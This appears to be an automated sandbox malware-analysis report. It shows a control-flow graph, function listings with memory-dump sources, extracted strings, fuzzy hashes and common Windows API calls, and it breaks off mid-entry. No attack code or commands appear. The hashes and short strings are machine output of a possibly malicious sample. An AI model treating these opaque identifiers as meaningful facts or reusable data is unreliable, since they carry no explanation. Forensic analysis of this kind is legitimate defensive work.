                                                                                                                                      control_flow_graph 2090 21695af-21695bd 2091 21695bf-21695c4 2090->2091 2092 21695c9-21695d5 2090->2092 2093 216995e-2169963 2091->2093 2095 21695d7-21695d9 2092->2095 2096 21695e5-21695ea 2092->2096 2097 21695e1-21695e3 2095->2097 2096->2093 2097->2096 2098 21695ef-21695fb 2097->2098 2100 21695fd-2169609 2098->2100 2101 216960b-2169610 2098->2101 2100->2101 2103 2169615-2169620 2100->2103 2101->2093 2105 2169626-2169631 2103->2105 2106 21696ca-21696d5 2103->2106 2109 2169647 2105->2109 2110 2169633-2169645 2105->2110 2111 21696db-21696ea 2106->2111 2112 2169778-2169784 2106->2112 2113 216964c-216964e 2109->2113 2110->2113 2121 21696ec-21696f6 2111->2121 2122 21696fb-216970a 2111->2122 2119 2169786-2169792 2112->2119 2120 2169794-21697a6 2112->2120 2115 2169650-216965f 2113->2115 2116 216966e-2169673 2113->2116 2115->2116 2126 2169661-216966c 2115->2126 2116->2093 2119->2120 2131 21697d4-21697df 2119->2131 2134 21697ca-21697cf 2120->2134 2135 21697a8-21697b4 2120->2135 2121->2093 2129 216972e-2169737 2122->2129 2130 216970c-2169718 2122->2130 2126->2116 2138 2169678-2169681 2126->2138 2144 216974d 2129->2144 2145 2169739-216974b 2129->2145 2140 2169724-2169729 2130->2140 2141 216971a-216971f 2130->2141 2142 21697e5-21697ee 2131->2142 2143 21698c1-21698cc 2131->2143 2134->2093 2151 21697b6-21697bb 2135->2151 2152 21697c0-21697c5 2135->2152 2154 2169683-2169688 2138->2154 2155 216968d-216969c 2138->2155 2140->2093 2141->2093 2159 2169804 2142->2159 2160 21697f0-2169802 2142->2160 2157 21698f6-2169905 2143->2157 2158 21698ce-21698d8 2143->2158 2146 2169752-2169754 2144->2146 2145->2146 2146->2112 2149 2169756-2169762 2146->2149 2169 2169764-2169769 2149->2169 2170 216976e-2169773 2149->2170 2151->2093 2152->2093 2154->2093 2165 21696c0-21696c5 2155->2165 2166 216969e-21696aa 2155->2166 2173 2169907-2169916 2157->2173 2174 2169959 2157->2174 2176 21698ef-21698f4 2158->2176 2177 21698da-21698e6 2158->2177 2162 2169809-216980b 2159->2162 2160->2162 2167 216980d-2169819 2162->2167 2168 216981b 2162->2168 2165->2093 2183 21696b6-21696bb 2166->2183 2184 21696ac-21696b1 2166->2184 2175 2169820-2169822 2167->2175 2168->2175 2169->2093 2170->2093 2173->2174 2186 2169918-2169930 2173->2186 2174->2093 2180 2169824-2169829 2175->2180 2181 216982e-2169841 2175->2181 2176->2093 2177->2176 2188 21698e8-21698ed 2177->2188 2180->2093 2189 2169843 2181->2189 2190 2169879-2169883 2181->2190 2183->2093 2184->2093 2201 2169952-2169957 2186->2201 2202 2169932-2169950 2186->2202 2188->2093 2192 2169846-2169857 call 2169410 2189->2192 2196 2169885-2169891 call 2169410 2190->2196 2197 21698a2-21698ae 2190->2197 2199 216985e-2169863 2192->2199 2200 2169859-216985c 2192->2200 2210 2169893-2169896 2196->2210 2211 2169898-216989d 2196->2211 2212 21698b7 2197->2212 2213 21698b0-21698b5 2197->2213 2199->2093 2200->2199 2204 2169868-216986b 2200->2204 2201->2093 2202->2093 2207 2169964-216998c 2204->2207 2208 2169871-2169877 2204->2208 2217 216998e-2169993 2207->2217 2218 2169998-21699a3 2207->2218 2208->2190 2208->2192 2210->2197 2210->2211 2211->2093 2214 21698bc 2212->2214 2213->2214 2214->2093 2219 2169b19-2169b1d 2217->2219 2222 2169a4b-2169a54 2218->2222 2223 21699a9-21699b4 2218->2223 2226 2169a56-2169a61 2222->2226 2227 2169a9f-2169aaa 2222->2227 2228 21699b6-21699c8 2223->2228 2229 21699ca 2223->2229 2238 2169b17 2226->2238 2239 2169a67-2169a79 2226->2239 2236 2169ac0 2227->2236 2237 2169aac-2169abe 2227->2237 2230 21699cf-21699d1 2228->2230 2229->2230 2231 2169a06-2169a18 2230->2231 2232 21699d3-21699e2 2230->2232 2231->2238 2247 2169a1e-2169a2c 2231->2247 2232->2231 2243 21699e4-21699fa 2232->2243 2241 2169ac5-2169ac7 2236->2241 2237->2241 2238->2219 2239->2238 2248 2169a7f-2169a83 2239->2248 2241->2238 2245 2169ac9-2169ad8 2241->2245 2243->2231 2266 21699fc-2169a01 2243->2266 2258 2169b00 2245->2258 2259 2169ada-2169ae3 2245->2259 2256 2169a2e-2169a33 2247->2256 2257 2169a38-2169a3b 2247->2257 2251 2169a85-2169a8a 2248->2251 2252 2169a8f-2169a92 2248->2252 2251->2219 2254 2169b1e-2169b4e call 2169530 2252->2254 2255 2169a98-2169a9b 2252->2255 2277 2169b65-2169b69 2254->2277 2278 2169b50-2169b64 2254->2278 2255->2248 2260 2169a9d 2255->2260 2256->2219 2257->2254 2261 2169a41-2169a44 2257->2261 2262 2169b05-2169b07 2258->2262 2269 2169ae5-2169af7 2259->2269 2270 2169af9 2259->2270 2260->2238 2261->2247 2264 2169a46 2261->2264 2262->2238 2265 2169b09-2169b15 2262->2265 2264->2238 2265->2219 2266->2219 2272 2169afe 2269->2272 2270->2272 2272->2262
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 4'q$4'q$;q
                                                                                                                                      • API String ID: 0-144927120
                                                                                                                                      • Opcode ID: 64caf6732ec3740eb76e96aa003dcfc182af2e69e570fcc1cb8a92b52722aff1
                                                                                                                                      • Instruction ID: 838e77743989452de7de7e847580d7e412af28d530b26b177612cb2e1c8a92d2
                                                                                                                                      • Opcode Fuzzy Hash: 64caf6732ec3740eb76e96aa003dcfc182af2e69e570fcc1cb8a92b52722aff1
                                                                                                                                      • Instruction Fuzzy Hash: E3F18F303842018FDB299F39C86CB3D779AAF84645F1A44AAE456CF3A5DB36CC61C791
                                                                                                                                      Function 021689A8 Relevance: 3.2, Strings: 2, Instructions: 699COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $q$$q
                                                                                                                                      • API String ID: 0-3126353813
                                                                                                                                      • Opcode ID: 1778a22a75eaca6cdec39a20838952c28713faa1628677a2753991f315ec41a7
                                                                                                                                      • Instruction ID: c61354dc097ad9b72e4c4157202163545fd85ae1a7aa114b8f48f4ff427189da
                                                                                                                                      • Opcode Fuzzy Hash: 1778a22a75eaca6cdec39a20838952c28713faa1628677a2753991f315ec41a7
                                                                                                                                      • Instruction Fuzzy Hash: D352C034E002198FEB649BA4C854BAEBB72FF88300F1081A9D50BAB795DF355E46DF51
                                                                                                                                      Function 02166448 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Hq$Hq
                                                                                                                                      • API String ID: 0-925789375
                                                                                                                                      • Opcode ID: 719d80595fceeed95464233b00ff938811b029c0502a38dcc3f7ee560e028323
                                                                                                                                      • Instruction ID: 012d53ac0ffcf2e96acda2c4177b8497fdb8fa331b5cd439552cdc1cbc970d20
                                                                                                                                      • Opcode Fuzzy Hash: 719d80595fceeed95464233b00ff938811b029c0502a38dcc3f7ee560e028323
                                                                                                                                      • Instruction Fuzzy Hash: 79B1CC307442948FDB199F38D85CB7E7BAAAFC8244F158929E406CB295CB78CC62C795
                                                                                                                                      Function 021669A8 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,q$,q
                                                                                                                                      • API String ID: 0-1667412543
                                                                                                                                      • Opcode ID: 4445f9b3db9e2aa1f96817e2bdd40a192be3b993d5cf2c84c04a92fe2c9dd481
                                                                                                                                      • Instruction ID: bb65f942ced697fc4222d78a40e6d36456a0cbf824d07e424d96bc60e8acc412
                                                                                                                                      • Opcode Fuzzy Hash: 4445f9b3db9e2aa1f96817e2bdd40a192be3b993d5cf2c84c04a92fe2c9dd481
                                                                                                                                      • Instruction Fuzzy Hash: B081E030B40146DFCB28CF69C888A7DBBBAFF88305B158169D415EB364DB39E851CB91
                                                                                                                                      Function 063B8ED8 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (&q$(q
                                                                                                                                      • API String ID: 0-2464455664
                                                                                                                                      • Opcode ID: f0104dbc99c4e12996ddfb4250c455e9d6223732555a5bc77654b232a2b1a43b
                                                                                                                                      • Instruction ID: 9ec503c859b820cf6cd18130c667f84d876bcaa8eff7702195a2b513bcd47132
                                                                                                                                      • Opcode Fuzzy Hash: f0104dbc99c4e12996ddfb4250c455e9d6223732555a5bc77654b232a2b1a43b
                                                                                                                                      • Instruction Fuzzy Hash: 50719F31F002198FDB19DFA9D8506EEBBF2AFC9700F149129E506AB380DE349D46C7A5
                                                                                                                                      Function 0641F050 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: E$LRq
                                                                                                                                      • API String ID: 0-865280463
                                                                                                                                      • Opcode ID: 5e591a7d5c1f7d5334e0c9afb6321d78f305e3674bc3043593f7d89b7211b16e
                                                                                                                                      • Instruction ID: 9eb1c130da04e2a84494a1113531a71cd16c3302d0fbba228563302036fe3722
                                                                                                                                      • Opcode Fuzzy Hash: 5e591a7d5c1f7d5334e0c9afb6321d78f305e3674bc3043593f7d89b7211b16e
                                                                                                                                      • Instruction Fuzzy Hash: 4B518E74F001058FCB94EF78D894A6E7BF2BF89200B14856AE416DF360EA34DC06CB91
                                                                                                                                      Function 02161190 Relevance: 1.8, Strings: 1, Instructions: 547COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LRq
                                                                                                                                      • API String ID: 0-3187445251
                                                                                                                                      • Opcode ID: 034c5441bb7abb97e78b535beadd9ab8c7d294cd3123918da4168119c15da378
                                                                                                                                      • Instruction ID: ac4901694245576cc1a1cde4a032101956248dba0001d7a007a86031334c0f5e
                                                                                                                                      • Opcode Fuzzy Hash: 034c5441bb7abb97e78b535beadd9ab8c7d294cd3123918da4168119c15da378
                                                                                                                                      • Instruction Fuzzy Hash: 3752DA34E00219CFCB54EF64E998A9DBBB2FB49301F1059A5D40AB7369DB302D8ADF44
                                                                                                                                      Function 021611A0 Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LRq
                                                                                                                                      • API String ID: 0-3187445251
                                                                                                                                      • Opcode ID: a333b257cb21696708a8161a3a9cc953cadecd74f5968f94cf9bf72a4538c02d
                                                                                                                                      • Instruction ID: 2fadbeafe675053ea3c928f7e0da190f64b7275e89481a70d2757279a0cb266a
                                                                                                                                      • Opcode Fuzzy Hash: a333b257cb21696708a8161a3a9cc953cadecd74f5968f94cf9bf72a4538c02d
                                                                                                                                      • Instruction Fuzzy Hash: D752DA34E40219CFCB54EF64E998A9DBBB2FB49301F1059A5D40AB7329DB302D8ADF44
                                                                                                                                      Function 070A44E2 Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 070A4746
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                      • Opcode ID: be755c3af96fc4af2a3701143f4478b5d192fe7473a63c2780f279a26486da8b
                                                                                                                                      • Instruction ID: 07b21b41bf34be19bc0f28ef512df0a8d8a1ebdec6a35afb743b03c5fb5541f4
                                                                                                                                      • Opcode Fuzzy Hash: be755c3af96fc4af2a3701143f4478b5d192fe7473a63c2780f279a26486da8b
                                                                                                                                      • Instruction Fuzzy Hash: 1D8168B4A00B469FDB64DF6AD44179ABBF1FF88300F008A2DE496D7A50D774E909CB91
                                                                                                                                      Function 070A66C4 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 070A67E2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: 8c033edca0c5654588c21aca481080389ed2961fd6953a4c07712fcfefac08bd
                                                                                                                                      • Instruction ID: 0ff582880bea4350377a1e0da3f2b3c5ddfb722ce12e746881f68011ba09cba9
                                                                                                                                      • Opcode Fuzzy Hash: 8c033edca0c5654588c21aca481080389ed2961fd6953a4c07712fcfefac08bd
                                                                                                                                      • Instruction Fuzzy Hash: 9451C2B5D10349EFDB14CFA9D884ADEBBF5BF48310F24822AE419AB250D7719845CF90
                                                                                                                                      Function 070A66D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 070A67E2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                      • Opcode ID: b697949ae52fc78d0de9a9e55b382e312a20e5990e8a0a7bceda18839f4ed8de
                                                                                                                                      • Instruction ID: 69343b7fda5df95f4ba2f31b131e16b28bcedc545d44dd354444abf417029e33
                                                                                                                                      • Opcode Fuzzy Hash: b697949ae52fc78d0de9a9e55b382e312a20e5990e8a0a7bceda18839f4ed8de
                                                                                                                                      • Instruction Fuzzy Hash: 7841A2B1D10349EFDB14CF99C884ADEBBF5BF48310F64822AE819AB250DB759845CF90
                                                                                                                                      Function 065DB808 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065DB897
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: f86df486b6bdbd1ee0d7a2798f6f1430dc42d13e18126324a5bffd79972eb5e0
                                                                                                                                      • Instruction ID: 7b16f57832313224c258b0eac3e6ee6ef7bf49c292196c1b1d3a4d46cf1dd75d
                                                                                                                                      • Opcode Fuzzy Hash: f86df486b6bdbd1ee0d7a2798f6f1430dc42d13e18126324a5bffd79972eb5e0
                                                                                                                                      • Instruction Fuzzy Hash: 6A414AB6900249AFDF10CF99D844AEEBFF9FB48310F15801AE954A7350C7359951DFA4
                                                                                                                                      Function 070A3BBC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 070A8ED1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                      • Opcode ID: f55a70da30e16e3195fce651f81290b1e2642018e0c84a375c3bd2808699706d
                                                                                                                                      • Instruction ID: 55c68fe91416f187101b84409dcda3980a4e48b13f724900bf1f073b3156ef21
                                                                                                                                      • Opcode Fuzzy Hash: f55a70da30e16e3195fce651f81290b1e2642018e0c84a375c3bd2808699706d
                                                                                                                                      • Instruction Fuzzy Hash: 714147B490030ADFCB14DF99C888AAAFBF5FB88314F24C559D519AB361C774A841CFA0
                                                                                                                                      Function 065DB810 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065DB897
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                      • Opcode ID: 64a853f417d3f9b1117ffca1808d0ff410404b41784b32b93e551c2cebf8c931
                                                                                                                                      • Instruction ID: c08b30a19ff8286f11404061a4268afb95aada2fdb5a4b0425c0d08bf26a8774
                                                                                                                                      • Opcode Fuzzy Hash: 64a853f417d3f9b1117ffca1808d0ff410404b41784b32b93e551c2cebf8c931
                                                                                                                                      • Instruction Fuzzy Hash: C421C4B5D002499FDB10CF9AD984ADEBBF5FB48310F14841AE918A3350D774A945CF65
                                                                                                                                      Function 061C995F Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(00000000), ref: 061C9AA1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 399f815791963ec1a74e85c4ea39848b343c48be1bef92dc2b667fce7235ec77
                                                                                                                                      • Instruction ID: 262989de1c6456673f57c07f8d8ce54a86bc410b89e430d5d708001b87105cd0
                                                                                                                                      • Opcode Fuzzy Hash: 399f815791963ec1a74e85c4ea39848b343c48be1bef92dc2b667fce7235ec77
                                                                                                                                      • Instruction Fuzzy Hash: B31159B4E002099FEB44CBA9D884AADB7B5BF88324F148969E844E7355D731EC41CB64
                                                                                                                                      Function 070A46E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 070A4746
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3690011982.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_70a0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HandleModule
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                      • Opcode ID: 30e81f81e658687627774e49a4215a66210198522cd3643bad6ecd86dde99f54
                                                                                                                                      • Instruction ID: 1a02c89ee3a1a71f3c9d4d54e369d2a1a9a37402f38aa422231637dc74127d18
                                                                                                                                      • Opcode Fuzzy Hash: 30e81f81e658687627774e49a4215a66210198522cd3643bad6ecd86dde99f54
                                                                                                                                      • Instruction Fuzzy Hash: C811E3B9C002899FDB10DF9AD444BDEFBF4EB49314F11851AD429B7210C375A545CFA5
                                                                                                                                      Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 959018026-0
                                                                                                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                      Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                      Function 0216B400 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq
                                                                                                                                      • API String ID: 0-1999159160
                                                                                                                                      • Opcode ID: 8467f14f4e27209dffc05d29b70a9a9c2e241f01a6d688327080ab08362cbe8d
                                                                                                                                      • Instruction ID: 7866ea147c7235a95e78f34ac81188a9a7c586834146877521d36b3589417210
